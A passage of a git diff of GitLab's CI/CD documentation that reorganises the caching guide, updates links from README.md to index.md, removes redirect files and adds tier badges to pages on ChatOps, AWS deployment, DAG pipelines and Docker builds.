configuration](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4070). -- [Old metrics server configuration](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4072). -- [Remove `FF_K8S_USE_ENTRYPOINT_OVER_COMMAND`](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4073). -- [Remove Linux distributions that reach EOL](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/1130). -- [Update command line API for helper images](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4013). -- [Remove old `git clean` flow](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4175). - -#### 11.0 - -- No breaking changes. - -#### 10.0 - -- No breaking changes. +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/caching/img/clear_runners_cache.png b/doc/ci/caching/img/clear_runners_cache.png Binary files differdeleted file mode 100644 index 4f1171513ad..00000000000 --- a/doc/ci/caching/img/clear_runners_cache.png +++ /dev/null diff --git a/doc/ci/caching/index.md b/doc/ci/caching/index.md index 0778d598d32..0ed1e978168 100644 --- a/doc/ci/caching/index.md +++ b/doc/ci/caching/index.md @@ -5,13 +5,13 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: index, concepts, howto --- -# Caching in GitLab CI/CD +# Caching in GitLab CI/CD **(FREE)** A cache is one or more files that a job downloads and saves. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. To learn how to define the cache in your `.gitlab-ci.yml` file, -see the [`cache` reference](../yaml/README.md#cache). +see the [`cache` reference](../yaml/index.md#cache). ## How cache is different from artifacts @@ -19,114 +19,127 @@ Use cache for dependencies, like packages you download from the internet. Cache is stored where GitLab Runner is installed and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). -- You can define it per job by using the `cache:` keyword. Otherwise it is disabled. -- You can define it per job so that: - - Subsequent pipelines can use it. - - Subsequent jobs in the same pipeline can use it, if the dependencies are identical. -- You cannot share it between projects. - Use artifacts to pass intermediate build results between stages. Artifacts are generated by a job, stored in GitLab, and can be downloaded. -- You can define artifacts per job. Subsequent jobs in later stages of the same - pipeline can use them. -- You can't use the artifacts in a different pipeline. - -Artifacts expire after 30 days unless you define an [expiration time](../yaml/README.md#artifactsexpire_in). -Use [dependencies](../yaml/README.md#dependencies) to control which jobs fetch the artifacts. - Both artifacts and caches define their paths relative to the project directory, and can't link to files outside it. +### Cache + +- Define cache per job by using the `cache:` keyword. Otherwise it is disabled. +- Subsequent pipelines can use the cache. +- Subsequent jobs in the same pipeline can use the cache, if the dependencies are identical. +- Different projects cannot share the cache. + +### Artifacts + +- Define artifacts per job. +- Subsequent jobs in later stages of the same pipeline can use artifacts. +- Different projects cannot share artifacts. + +Artifacts expire after 30 days unless you define an [expiration time](../yaml/index.md#artifactsexpire_in). +Use [dependencies](../yaml/index.md#dependencies) to control which jobs fetch the artifacts. + ## Good caching practices -To ensure maximum availability of the cache, when you declare `cache` in your jobs, -use one or more of the following: +To ensure maximum availability of the cache, do one or more of the following: - [Tag your runners](../runners/configure_runners.md#use-tags-to-limit-the-number-of-jobs-using-the-runner) and use the tag on jobs - that share their cache. + that share the cache. - [Use runners that are only available to a particular project](../runners/runners_scope.md#prevent-a-specific-runner-from-being-enabled-for-other-projects). -- [Use a `key`](../yaml/README.md#cachekey) that fits your workflow (for example, - different caches on each branch). For that, you can take advantage of the - [predefined CI/CD variables](../variables/README.md#predefined-cicd-variables). +- [Use a `key`](../yaml/index.md#cachekey) that fits your workflow. For example, + you can configure a different cache for each branch. For runners to work with caches efficiently, you must do one of the following: - Use a single runner for all your jobs. -- Use multiple runners (in autoscale mode or not) that use +- Use multiple runners that have [distributed caching](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching), - where the cache is stored in S3 buckets (like shared runners on GitLab.com). -- Use multiple runners (not in autoscale mode) of the same architecture that - share a common network-mounted directory (using NFS or something similar) - where the cache is stored. + where the cache is stored in S3 buckets. Shared runners on GitLab.com behave this way. These runners can be in autoscale mode, + but they don't have to be. +- Use multiple runners with the same architecture and have these runners + share a common network-mounted directory to store the cache. This directory should use NFS or something similar. + These runners must be in autoscale mode. -Read about the [availability of the cache](#availability-of-the-cache) -to learn more about the internals and get a better idea how cache works. +## Use multiple caches -### Share caches between jobs in the same branch +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32814) in GitLab 13.10. +> - [Feature Flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/321877), in GitLab 13.12. -Define a cache with the `key: ${CI_COMMIT_REF_SLUG}` so that jobs of each -branch always use the same cache: +You can have a maximum of four caches: ```yaml -cache: - key: ${CI_COMMIT_REF_SLUG} +test-job: + stage: build + cache: + - key: + files: + - Gemfile.lock + paths: + - vendor/ruby + - key: + files: + - yarn.lock + paths: + - .yarn-cache/ + script: + - bundle install --path=vendor + - yarn install --cache-folder .yarn-cache + - echo Run tests... ``` -This configuration is safe from accidentally overwriting the cache, but merge requests -get slow first pipelines. The next time a new commit is pushed to the branch, the -cache is re-used and jobs run faster. +If multiple caches are combined with a fallback cache key, +the fallback cache is fetched every time a cache is not found. -To enable per-job and per-branch caching: +## Use a fallback cache key -```yaml -cache: - key: "$CI_JOB_NAME-$CI_COMMIT_REF_SLUG" -``` +> [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/1534) in GitLab Runner 13.4. -To enable per-stage and per-branch caching: - -```yaml -cache: - key: "$CI_JOB_STAGE-$CI_COMMIT_REF_SLUG" -``` +You can use the `$CI_COMMIT_REF_SLUG` [predefined variable](../variables/predefined_variables.md) +to specify your [`cache:key`](../yaml/index.md#cachekey). For example, if your +`$CI_COMMIT_REF_SLUG` is `test`, you can set a job to download cache that's tagged with `test`. -### Share caches across jobs in different branches +If a cache with this tag is not found, you can use `CACHE_FALLBACK_KEY` to +specify a cache to use when none exists. -To share a cache across all branches and all jobs, use the same key for everything: +In the following example, if the `$CI_COMMIT_REF_SLUG` is not found, the job uses the key defined +by the `CACHE_FALLBACK_KEY` variable: ```yaml -cache: - key: one-key-to-rule-them-all -``` - -To share caches between branches, but have a unique cache for each job: +variables: + CACHE_FALLBACK_KEY: fallback-key -```yaml -cache: - key: ${CI_JOB_NAME} +job1: + script: + - echo + cache: + key: "$CI_COMMIT_REF_SLUG" + paths: + - binaries/ ``` -### Disable cache for specific jobs +## Disable cache for specific jobs + +If you define the cache globally, each job uses the +same definition. You can override this behavior for each job. -If you have defined the cache globally, it means that each job uses the -same definition. You can override this behavior per-job, and if you want to -disable it completely, use an empty hash: +To disable it completely for a job, use an empty hash: ```yaml job: cache: {} ``` -### Inherit global configuration, but override specific settings per job +## Inherit global configuration, but override specific settings per job You can override cache settings without overwriting the global cache by using -[anchors](../yaml/README.md#anchors). For example, if you want to override the +[anchors](../yaml/index.md#anchors). For example, if you want to override the `policy` for one job: ```yaml cache: &global_cache - key: ${CI_COMMIT_REF_SLUG} + key: $CI_COMMIT_REF_SLUG paths: - node_modules/ - public/ @@ -141,24 +154,66 @@ job: policy: pull ``` -For more fine tuning, read also about the -[`cache: policy`](../yaml/README.md#cachepolicy). +For more information, see [`cache: policy`](../yaml/index.md#cachepolicy). + +## Common use cases for caches + +Usually you use caches to avoid downloading content, like dependencies +or libraries, each time you run a job. Node.js packages, +PHP packages, Ruby gems, Python libraries, and others can be cached. + +For examples, see the [GitLab CI/CD templates](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). + +### Share caches between jobs in the same branch + +To have jobs in each branch use the same cache, define a cache with the `key: $CI_COMMIT_REF_SLUG`: + +```yaml +cache: + key: $CI_COMMIT_REF_SLUG +``` + +This configuration prevents you from accidentally overwriting the cache. However, the +first pipeline for a merge request is slow. The next time a commit is pushed to the branch, the +cache is re-used and jobs run faster. -## Common use cases +To enable per-job and per-branch caching: -The most common use case of caching is to avoid downloading content like dependencies -or libraries repeatedly between subsequent runs of jobs. Node.js packages, -PHP packages, Ruby gems, Python libraries, and others can all be cached. +```yaml +cache: + key: "$CI_JOB_NAME-$CI_COMMIT_REF_SLUG" +``` -For more examples, check out our [GitLab CI/CD templates](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). +To enable per-stage and per-branch caching: + +```yaml +cache: + key: "$CI_JOB_STAGE-$CI_COMMIT_REF_SLUG" +``` + +### Share caches across jobs in different branches + +To share a cache across all branches and all jobs, use the same key for everything: + +```yaml +cache: + key: one-key-to-rule-them-all +``` + +To share a cache between branches, but have a unique cache for each job: + +```yaml +cache: + key: $CI_JOB_NAME +``` ### Cache Node.js dependencies -If your project is using [npm](https://www.npmjs.com/) to install the Node.js +If your project uses [npm](https://www.npmjs.com/) to install Node.js dependencies, the following example defines `cache` globally so that all jobs inherit it. -By default, npm stores cache data in the home folder `~/.npm` but you -[can't cache things outside of the project directory](../yaml/README.md#cachepaths). -Instead, we tell npm to use `./.npm`, and cache it per-branch: +By default, npm stores cache data in the home folder (`~/.npm`). However, you +[can't cache things outside of the project directory](../yaml/index.md#cachepaths). +Instead, tell npm to use `./.npm`, and cache it per-branch: ```yaml # @@ -168,7 +223,7 @@ image: node:latest # Cache modules in between jobs cache: - key: ${CI_COMMIT_REF_SLUG} + key: $CI_COMMIT_REF_SLUG paths: - .npm/ @@ -182,8 +237,8 @@ test_async: ### Cache PHP dependencies -Assuming your project is using [Composer](https://getcomposer.org/) to install -the PHP dependencies, the following example defines `cache` globally so that +If your project uses [Composer](https://getcomposer.org/) to install +PHP dependencies, the following example defines `cache` globally so that all jobs inherit it. PHP libraries modules are installed in `vendor/` and are cached per-branch: @@ -195,7 +250,7 @@ image: php:7.2 # Cache libraries in between jobs cache: - key: ${CI_COMMIT_REF_SLUG} + key: $CI_COMMIT_REF_SLUG paths: - vendor/ @@ -211,9 +266,9 @@ test: ### Cache Python dependencies -Assuming your project is using [pip](https://pip.pypa.io/en/stable/) to install -the Python dependencies, the following example defines `cache` globally so that -all jobs inherit it. Python libraries are installed in a virtual environment under `venv/`, +If your project uses [pip](https://pip.pypa.io/en/stable/) to install +Python dependencies, the following example defines `cache` globally so that +all jobs inherit it. Python libraries are installed in a virtual environment under `venv/`. pip's cache is defined under `.cache/pip/` and both are cached per-branch: ```yaml @@ -252,7 +307,7 @@ test: ### Cache Ruby dependencies -Assuming your project is using [Bundler](https://bundler.io) to install the +If your project uses [Bundler](https://bundler.io) to install gem dependencies, the following example defines `cache` globally so that all jobs inherit it. Gems are installed in `vendor/ruby/` and are cached per-branch: @@ -264,7 +319,7 @@ image: ruby:2.6 # Cache gems in between builds cache: - key: ${CI_COMMIT_REF_SLUG} + key: $CI_COMMIT_REF_SLUG paths: - vendor/ruby @@ -277,7 +332,7 @@ rspec: - rspec spec ``` -If you have jobs that each need a different selection of gems, use the `prefix` +If you have jobs that need different gems, use the `prefix` keyword in the global `cache` definition. This configuration generates a different cache for each job. @@ -289,7 +344,7 @@ cache: key: files: - Gemfile.lock - prefix: ${CI_JOB_NAME} + prefix: $CI_JOB_NAME paths: - vendor/ruby @@ -310,7 +365,7 @@ deploy_job: ### Cache Go dependencies -Assuming your project is using [Go Modules](https://github.com/golang/go/wiki/Modules) to install +If your project uses [Go Modules](https://github.com/golang/go/wiki/Modules) to install Go dependencies, the following example defines `cache` in a `go-cache` template, that any job can extend. Go modules are installed in `${GOPATH}/pkg/mod/` and are cached for all of the `go` projects: @@ -334,35 +389,33 @@ test: ## Availability of the cache -Caching is an optimization, but it isn't guaranteed to always work. You need to -be prepared to regenerate any cached files in each job that needs them. +Caching is an optimization, but it isn't guaranteed to always work. You might need +to regenerate cached files in each job that needs them. -After you have defined a [cache in `.gitlab-ci.yml`](../yaml/README.md#cache), +After you define a [cache in `.gitlab-ci.yml`](../yaml/index.md#cache), the availability of the cache depends on: -- The runner's executor type +- The runner's executor type. - Whether different runners are used to pass the cache between jobs. ### Where the caches are stored -The runner is responsible for storing the cache, so it's essential -to know **where** it's stored. All the cache paths defined under a job in -`.gitlab-ci.yml` are archived in a single `cache.zip` file and stored in the -runner's configured cache location. By default, they are stored locally in the -machine where the runner is installed and depends on the type of the executor. +All caches defined for a job are archived in a single `cache.zip` file. +The runner configuration defines where the file is stored. By default, the cache +is stored on the machine where GitLab Runner is installed. The location also depends on the type of executor. -| GitLab Runner executor | Default path of the cache | +| Runner executor | Default path of the cache | | ---------------------- | ------------------------- | -| [Shell](https://docs.gitlab.com/runner/executors/shell.html) | Locally, stored under the `gitlab-runner` user's home directory: `/home/gitlab-runner/cache/<user>/<project>/<cache-key>/cache.zip`. | -| [Docker](https://docs.gitlab.com/runner/executors/docker.html) | Locally, stored under [Docker volumes](https://docs.gitlab.com/runner/executors/docker.html#the-builds-and-cache-storage): `/var/lib/docker/volumes/<volume-id>/_data/<user>/<project>/<cache-key>/cache.zip`. | -| [Docker machine](https://docs.gitlab.com/runner/executors/docker_machine.html) (autoscale runners) | Behaves the same as the Docker executor. | +| [Shell](https://docs.gitlab.com/runner/executors/shell.html) | Locally, under the `gitlab-runner` user's home directory: `/home/gitlab-runner/cache/<user>/<project>/<cache-key>/cache.zip`. | +| [Docker](https://docs.gitlab.com/runner/executors/docker.html) | Locally, under [Docker volumes](https://docs.gitlab.com/runner/executors/docker.html#the-builds-and-cache-storage): `/var/lib/docker/volumes/<volume-id>/_data/<user>/<project>/<cache-key>/cache.zip`. | +| [Docker Machine](https://docs.gitlab.com/runner/executors/docker_machine.html) (autoscale runners) | The same as the Docker executor. | If you use cache and artifacts to store the same path in your jobs, the cache might be overwritten because caches are restored before artifacts. ### How archiving and extracting works -This example has two jobs that belong to two consecutive stages: +This example shows two jobs in two consecutive stages: ```yaml stages: @@ -394,7 +447,7 @@ job B: - vendor/ ``` -If you have one machine with one runner installed, and all jobs for your project +If one machine has one runner installed, then all jobs for your project run on the same host: 1. Pipeline starts. @@ -434,27 +487,54 @@ different architecture (for example, when the cache includes binary files). Also because the different steps might be executed by runners running on different machines, it is a safe default. +## Clearing the cache + +Runners use [cache](../yaml/index.md#cache) to speed up the execution +of your jobs by reusing existing data. This can sometimes lead to +inconsistent behavior. + +There are two ways to start with a fresh copy of the cache. + +### Clear the cache by changing `cache:key` + +Change the value for `cache: key` in your `.gitlab-ci.yml` file. +The next time the pipeline runs, the cache is stored in a different location. + +### Clear the cache manually + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41249) in GitLab 10.4. + +You can clear the cache in the GitLab UI: + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **CI/CD > Pipelines** page. +1. In the top right, select **Clear runner caches**. + +On the next commit, your CI/CD jobs use a new cache. + +NOTE: +Each time you clear the cache manually, the [internal cache name](#where-the-caches-are-stored) is updated. The name uses the format `cache-<index>`, and the index increments by one. The old cache is not deleted. You can manually delete these files from the runner storage. + +## Troubleshooting + ### Cache mismatch -In the following table, you can see some reasons where you might hit a cache -mismatch and a few ideas how to fix it. +If you have a cache mismatch, follow these steps to troubleshoot. -| Reason of a cache mismatch | How to fix it | -| -------------------------- | ------------- | -| You use multiple standalone runners (not in autoscale mode) attached to one project without a shared cache | Use only one runner for your project or use multiple runners with distributed cache enabled | -| You use runners in autoscale mode without a distributed cache enabled | Configure the autoscale runner to use a distributed cache | -| The machine the runner is installed on is low on disk space or, if you've set up distributed cache, the S3 bucket where the cache is stored doesn't have enough space | Make sure you clear some space to allow new caches to be stored. There's no automatic way to do this. | +| Reason for a cache mismatch | How to fix it | +| --------------------------- | ------------- | +| You use multiple standalone runners (not in autoscale mode) attached to one project without a shared cache. | Use only one runner for your project or use multiple runners with distributed cache enabled. | +| You use runners in autoscale mode without a distributed cache enabled. | Configure the autoscale runner to use a distributed cache. | +| The machine the runner is installed on is low on disk space or, if you've set up distributed cache, the S3 bucket where the cache is stored doesn't have enough space. | Make sure you clear some space to allow new caches to be stored. There's no automatic way to do this. | | You use the same `key` for jobs where they cache different paths. | Use different cache keys to that the cache archive is stored to a different location and doesn't overwrite wrong caches. | -Let's explore some examples. - -#### Examples +#### Cache mismatch example 1 -Let's assume you have only one runner assigned to your project, so the cache -is stored in the runner's machine by default. +If you have only one runner assigned to your project, the cache +is stored on the runner's machine by default. -Two jobs could cause caches to be overwritten if they have the same cache key, but -they cache a different path: +If two jobs have the same cache key but a different path, the caches can be overwritten. +For example: ```yaml stages: @@ -486,11 +566,14 @@ job B: 1. The next time `job A` runs it uses the cache of `job B` which is different and thus isn't effective. -To fix that, use different `keys` for each job. +To fix this issue, use different `keys` for each job. -In another case, let's assume you have more than one runner assigned to your -project, but the distributed cache is not enabled. The second time the -pipeline is run, we want `job A` and `job B` to re-use their cache (which in this case +#### Cache mismatch example 2 + +In this example, you have more than one runner assigned to your +project, and distributed cache is not enabled. + +The second time the pipeline runs, you want `job A` and `job B` to re-use their cache (which in this case is different): ```yaml @@ -516,46 +599,4 @@ job B: ``` Even if the `key` is different, the cached files might get "cleaned" before each -stage if the jobs run on different runners in the subsequent pipelines. - -## Clearing the cache - -Runners use [cache](../yaml/README.md#cache) to speed up the execution -of your jobs by reusing existing data. This however, can sometimes lead to an -inconsistent behavior. - -To start with a fresh copy of the cache, there are two ways to do that. - -### Clearing the cache by changing `cache:key` - -All you have to do is set a new `cache: key` in your `.gitlab-ci.yml`. In the -next run of the pipeline, the cache is stored in a different location. - -### Clearing the cache manually - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/41249) in GitLab 10.4. - -If you want to avoid editing `.gitlab-ci.yml`, you can clear the cache -via the GitLab UI: - -1. Navigate to your project's **CI/CD > Pipelines** page. -1. Click on the **Clear runner caches** button to clean up the cache. - -  - -1. On the next push, your CI/CD job uses a new cache. - -NOTE: -Each time you clear the cache manually, the [internal cache name](#where-the-caches-are-stored) is updated. The name uses the format `cache-<index>`, and the index increments by one each time. The old cache is not deleted. You can manually delete these files from the runner storage. - -<!-- ## Troubleshooting - -Include any troubleshooting steps that you can foresee. If you know beforehand what issues -one might have when setting this up, or when something is changed, or on upgrading, it's -important to describe those, too. Think of things that may go wrong and include them here. -This is important to minimize requests for support, and to avoid doc comments with -questions that you know someone might ask. - -Each scenario can be a third-level heading, e.g. `### Getting error message X`. -If you have none to add when creating a doc, leave this section in place -but commented out to help encourage others to add to it in the future. --> +stage if the jobs run on different runners in subsequent pipelines. diff --git a/doc/ci/chatops/README.md b/doc/ci/chatops/README.md deleted file mode 100644 index 577a80407d7..00000000000 --- a/doc/ci/chatops/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-01' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/chatops/index.md b/doc/ci/chatops/index.md index 5f661731660..03a1005c9bc 100644 --- a/doc/ci/chatops/index.md +++ b/doc/ci/chatops/index.md @@ -25,23 +25,23 @@ with the following arguments: - A `<job name>` to execute. - The `<job arguments>`. -ChatOps passes the following [CI/CD variables](../variables/README.md#predefined-cicd-variables) +ChatOps passes the following [CI/CD variables](../variables/index.md#predefined-cicd-variables) to the job: - `CHAT_INPUT` contains any additional arguments. - `CHAT_CHANNEL` is set to the name of channel the action was triggered in. When executed, ChatOps looks up the specified job name and attempts to match it -to a corresponding job in [`.gitlab-ci.yml`](../yaml/README.md). If a matching job -is found on `master`, a pipeline containing only that job is scheduled. After the +to a corresponding job in [`.gitlab-ci.yml`](../yaml/index.md). If a matching job +is found on the default branch, a pipeline containing only that job is scheduled. After the job completes: - If the job completes in *less than 30 minutes*, the ChatOps sends the job's output to Slack. - If the job completes in *more than 30 minutes*, the job must use the [Slack API](https://api.slack.com/) to send data to the channel. -To use the `run` command, you must have -[Developer access or above](../../user/permissions.md#project-members-permissions). +To use the `run` command, you must have at least the +[Developer role](../../user/permissions.md#project-members-permissions). If a job shouldn't be able to be triggered from chat, you can set the job to `except: [chat]`. ## Best practices for ChatOps CI jobs @@ -53,11 +53,11 @@ functions available. Consider these best practices when creating ChatOps jobs: of the standard CI pipeline. - If the job is set to `when: manual`, ChatOps creates the pipeline, but the job waits to be started. - ChatOps provides limited support for access control. If the user triggering the - slash command has [Developer access or above](../../user/permissions.md#project-members-permissions) + slash command has at least the [Developer role](../../user/permissions.md#project-members-permissions) in the project, the job runs. The job itself can use existing - [CI/CD variables](../variables/README.md#predefined-cicd-variables) like + [CI/CD variables](../variables/index.md#predefined-cicd-variables) like `GITLAB_USER_ID` to perform additional rights validation, but - these variables can be [overridden](../variables/README.md#cicd-variable-precedence). + these variables can be [overridden](../variables/index.md#cicd-variable-precedence). ### Controlling the ChatOps reply diff --git a/doc/ci/ci_cd_for_external_repos/bitbucket_integration.md b/doc/ci/ci_cd_for_external_repos/bitbucket_integration.md index 4d3f12dff05..7eaafcf21bb 100644 --- a/doc/ci/ci_cd_for_external_repos/bitbucket_integration.md +++ b/doc/ci/ci_cd_for_external_repos/bitbucket_integration.md @@ -20,7 +20,7 @@ To use GitLab CI/CD with a Bitbucket Cloud repository:  - GitLab imports the repository and enables [Pull Mirroring](../../user/project/repository/repository_mirroring.md#pulling-from-a-remote-repository). + GitLab imports the repository and enables [Pull Mirroring](../../user/project/repository/repository_mirroring.md#pull-from-a-remote-repository). 1. In GitLab create a [Personal Access Token](../../user/profile/personal_access_tokens.md) diff --git a/doc/ci/ci_cd_for_external_repos/github_integration.md b/doc/ci/ci_cd_for_external_repos/github_integration.md index c6fa049dc6e..7a79794f322 100644 --- a/doc/ci/ci_cd_for_external_repos/github_integration.md +++ b/doc/ci/ci_cd_for_external_repos/github_integration.md @@ -22,7 +22,7 @@ cannot be used to authenticate with GitHub as an external CI/CD repository. ## Connect with Personal Access Token Personal access tokens can only be used to connect GitHub.com -repositories to GitLab, and the GitHub user must have the [owner role](https://docs.github.com/en/github/getting-started-with-github/access-permissions-on-github). +repositories to GitLab, and the GitHub user must have the [owner role](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github). To perform a one-off authorization with GitHub to grant GitLab access your repositories: @@ -46,7 +46,7 @@ repositories: GitLab: 1. Imports the project. -1. Enables [Pull Mirroring](../../user/project/repository/repository_mirroring.md#pulling-from-a-remote-repository) +1. Enables [Pull Mirroring](../../user/project/repository/repository_mirroring.md#pull-from-a-remote-repository) 1. Enables [GitHub project integration](../../user/project/integrations/github.md) 1. Creates a web hook on GitHub to notify GitLab of new commits. diff --git a/doc/ci/cloud_deployment/ecs/quick_start_guide.md b/doc/ci/cloud_deployment/ecs/quick_start_guide.md index a801be549df..9cf9d2a1f06 100644 --- a/doc/ci/cloud_deployment/ecs/quick_start_guide.md +++ b/doc/ci/cloud_deployment/ecs/quick_start_guide.md @@ -14,7 +14,7 @@ In this guide, you begin by creating an ECS cluster manually using the AWS conso deploy a simple application that you create from a GitLab template. These instructions work for both SaaS and self-managed GitLab instances. -Ensure your own [runners are configured](../../runners/README.md). +Ensure your own [runners are configured](../../runners/index.md). ## Prerequisites @@ -211,7 +211,7 @@ Do not share the secret access key in a public place. You must save it in a secu ### Setup credentials in GitLab to let pipeline jobs access to ECS -You can register the access information in [GitLab Environment Variables](../../variables/README.md#custom-cicd-variables). +You can register the access information in [GitLab Environment Variables](../../variables/index.md#custom-cicd-variables). These variables are injected into the pipeline jobs and can access the ECS API. 1. Go to **ecs-demo** project on GitLab. diff --git a/doc/ci/cloud_deployment/index.md b/doc/ci/cloud_deployment/index.md index e8f3fe3f4d9..c14d94fcd61 100644 --- a/doc/ci/cloud_deployment/index.md +++ b/doc/ci/cloud_deployment/index.md @@ -43,7 +43,7 @@ Some credentials are required to be able to run `aws` commands: A new **Access key ID** and **Secret access key** are generated. Please take a note of them right away. 1. In your GitLab project, go to **Settings > CI/CD**. Set the following as - [CI/CD variables](../variables/README.md) + [CI/CD variables](../variables/index.md) (see table below): - Access key ID. @@ -91,7 +91,7 @@ path to point to your ECR image. > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207962) in GitLab 12.9. > - The `Deploy-ECS.gitlab-ci.yml` template was [moved](https://gitlab.com/gitlab-org/gitlab/-/issues/220821) to `AWS/Deploy-ECS.gitlab-ci.yml` in GitLab 13.2. -GitLab provides a series of [CI templates that you can include in your project](../yaml/README.md#include). +GitLab provides a series of [CI templates that you can include in your project](../yaml/index.md#include). To automate deployments of your application to your [Amazon Elastic Container Service](https://aws.amazon.com/ecs/) (AWS ECS) cluster, you can `include` the `AWS/Deploy-ECS.gitlab-ci.yml` template in your `.gitlab-ci.yml` file. @@ -101,7 +101,7 @@ GitLab also provides [Docker images](https://gitlab.com/gitlab-org/cloud-deploy/ - Use `registry.gitlab.com/gitlab-org/cloud-deploy/aws-ecs:latest` to deploy your application to AWS ECS. Before getting started with this process, you need a cluster on AWS ECS, as well as related -components, like an ECS service, ECS task definition, a database on AWS RDS, etc. +components, like an ECS service, ECS task definition, a database on AWS RDS, and so on. [Read more about AWS ECS](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/Welcome.html). The ECS task definition can be: @@ -117,7 +117,7 @@ After you have these prerequisites ready, follow these steps: 1. Make sure your AWS credentials are set up as CI/CD variables for your project. You can follow [the steps above](#run-aws-commands-from-gitlab-cicd) to complete this setup. 1. Add these variables to your project's `.gitlab-ci.yml` file, or in the project's - [CI/CD settings](../variables/README.md#custom-cicd-variables): + [CI/CD settings](../variables/index.md#custom-cicd-variables): - `CI_AWS_ECS_CLUSTER`: The name of the AWS ECS cluster that you're targeting for your deployments. - `CI_AWS_ECS_SERVICE`: The name of the targeted service tied to your AWS ECS cluster. @@ -146,7 +146,7 @@ After you have these prerequisites ready, follow these steps: ``` You can create your `CI_AWS_ECS_TASK_DEFINITION_FILE` variable as a - [file-typed CI/CD variable](../variables/README.md#cicd-variable-types) instead of a + [file-typed CI/CD variable](../variables/index.md#cicd-variable-types) instead of a regular CI/CD variable. If you choose to do so, set the variable value to be the full contents of the JSON task definition. You can then remove the JSON file from your project. @@ -231,7 +231,7 @@ pass three JSON input objects, based on existing templates: - [Template for the _Create stack_ step on AWS](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-anatomy.html). - Template for the _Push to S3_ step. Note that `source` is where a preceding `build` job built - your application, exporting the build through [`artifacts:paths`](../yaml/README.md#artifactspaths): + your application, exporting the build through [`artifacts:paths`](../yaml/index.md#artifactspaths): ```json { @@ -257,7 +257,7 @@ pass three JSON input objects, based on existing templates: CI_AWS_EC2_DEPLOYMENT_FILE: 'aws/create_deployment.json' ``` - - Alternatively, you can provide these JSON objects as [file-typed CI/CD variables](../variables/README.md#cicd-variable-types). + - Alternatively, you can provide these JSON objects as [file-typed CI/CD variables](../variables/index.md#cicd-variable-types). In your project, go to **Settings > CI/CD > Variables** and add the three variables listed above as file-typed CI/CD variables. For each variable, set the value to its corresponding JSON object. diff --git a/doc/ci/directed_acyclic_graph/index.md b/doc/ci/directed_acyclic_graph/index.md index e9725a29fc7..d965d4b83f9 100644 --- a/doc/ci/directed_acyclic_graph/index.md +++ b/doc/ci/directed_acyclic_graph/index.md @@ -66,9 +66,9 @@ as quickly as possible. ## Usage -Relationships are defined between jobs using the [`needs:` keyword](../yaml/README.md#needs). +Relationships are defined between jobs using the [`needs:` keyword](../yaml/index.md#needs). -Note that `needs:` also works with the [parallel](../yaml/README.md#parallel) keyword, +Note that `needs:` also works with the [parallel](../yaml/index.md#parallel) keyword, giving you powerful options for parallelization within your pipeline. ## Limitations @@ -76,7 +76,7 @@ giving you powerful options for parallelization within your pipeline. A directed acyclic graph is a complicated feature, and as of the initial MVC there are certain use cases that you may need to work around. For more information: -- [`needs` requirements and limitations](../yaml/README.md#requirements-and-limitations). +- [`needs` requirements and limitations](../yaml/index.md#requirements-and-limitations). - Related epic [tracking planned improvements](https://gitlab.com/groups/gitlab-org/-/epics/1716). ## Needs Visualization diff --git a/doc/ci/docker/README.md b/doc/ci/docker/README.md deleted file mode 100644 index 577a80407d7..00000000000 --- a/doc/ci/docker/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-01' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/docker/index.md b/doc/ci/docker/index.md index 20599c5ca85..4f6da72af12 100644 --- a/doc/ci/docker/index.md +++ b/doc/ci/docker/index.md @@ -6,9 +6,9 @@ comments: false type: index --- -# Docker integration +# Docker integration **(FREE)** -There are two primary ways to incorporate [Docker](https://www.docker.com) in your CI/CD workflow. +There are two primary ways to incorporate [Docker](https://www.docker.com) into your CI/CD workflow: - **[Run your CI/CD jobs](using_docker_images.md) in Docker containers.** diff --git a/doc/ci/docker/using_docker_build.md b/doc/ci/docker/using_docker_build.md index 9dac08324c8..c56bc9a4dc8 100644 --- a/doc/ci/docker/using_docker_build.md +++ b/doc/ci/docker/using_docker_build.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: concepts, howto --- -# Use Docker to build Docker images +# Use Docker to build Docker images **(FREE)** You can use GitLab CI/CD with Docker to create Docker images. For example, you can create a Docker image of your application, @@ -25,8 +25,8 @@ To enable Docker commands for your CI/CD jobs, you can use: If you don't want to execute a runner in privileged mode, but want to use `docker build`, you can also [use kaniko](using_kaniko.md). -If you are using shared runners on GitLab.com, -[learn more about how these runners are configured](../runners/README.md). +If you are using shared runners on GitLab.com, +[learn more about how these runners are configured](../runners/index.md). ### Use the shell executor @@ -90,7 